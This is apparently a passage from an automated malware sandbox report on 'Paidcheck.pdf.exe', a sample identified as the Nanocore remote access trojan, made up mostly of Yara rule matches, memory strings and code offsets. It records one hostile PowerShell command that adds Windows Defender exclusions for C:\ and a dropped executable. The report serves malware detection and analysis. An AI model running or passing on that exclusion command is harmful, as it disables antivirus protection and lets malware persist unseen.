Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 0000000B.00000003.373704213.00000000055FF000.00000004.00000001.sdmp, String found in binary or memory: https://go.micro
Source: Paidcheck.pdf.exe, 00000000.00000002.305273244.0000000000E70000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: RegAsm.exe, 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, Binary or memory string: RegisterRawInputDevices

      E-Banking Fraud:

      Yara detected Nanocore RAT
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY

      System Summary:

      Malicious sample detected (through community Yara rule)
      Source: 10.2.RegAsm.exe.6aa0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6af0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6540000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b20000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6540000.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b3e8a4.34.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6a60000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3bd9930.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ac0000.28.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3d4d481.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.6af0000.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.2c6410c.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ae0000.30.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3bd9930.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3d596b5.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b30000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f20eae.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b00000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b34c9f.35.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6a60000.25.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b00000.32.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f2f2de.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ab0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.5cf0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f20eae.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ab0000.27.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.3f1807f.17.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.6ac0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b20000.33.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ad0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3bde5cf.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f2f2de.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c06b78.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c57ec4.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b70000.37.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.6ae0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3be81d4.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b30000.36.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b70000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.2c6410c.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c6410c.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.2c78748.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c78748.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.2c57ec4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c57ec4.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.486430040.0000000003EBC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: Paidcheck.pdf.exe
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_006A29C0
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_00E5C204
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_00E5E5C0
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_00E5E5D0
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF963C
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF00FB
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF012D
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_0733FC48
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_07B28180
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_006A2050
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_00763DFE
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_065402B0
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_029BE480
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_029BE471
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_029BBBD4
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_05096550
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509CFB0
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_05093E30
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509C398
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_05094A50
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509D06E
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_05094B08
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509BA27
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509D2E8
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC9C90
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CCA5F0
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC2D10
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC1818
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC276E
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC24EE
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC2430
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CCE27A
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC9910
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC4921
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_070507D8
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00CA3DFE
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 19_2_002A3DFE
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 21_2_008A3DFE
      Source: Paidcheck.pdf.exe, 00000000.00000002.305273244.0000000000E70000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000003.303465052.0000000003FEB000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameQjisrzmpsmlj.dll" vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000003.303229105.000000000739C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameConsoleApp18709999999999999999.exeN vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.319081294.00000000072F0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.319081294.00000000072F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.318898900.0000000007290000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.305879453.0000000002C21000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIureehicuwdmdjhbahb.dllH vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exeBinary or memory string: OriginalFilenameConsoleApp18709999999999999999.exeN vs Paidcheck.pdf.exe
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: sfc.dll
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: sfc.dll
      Source: Paidcheck.pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: 10.2.RegAsm.exe.6aa0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6aa0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6af0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6af0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6540000.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6540000.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b20000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b20000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6540000.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6540000.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
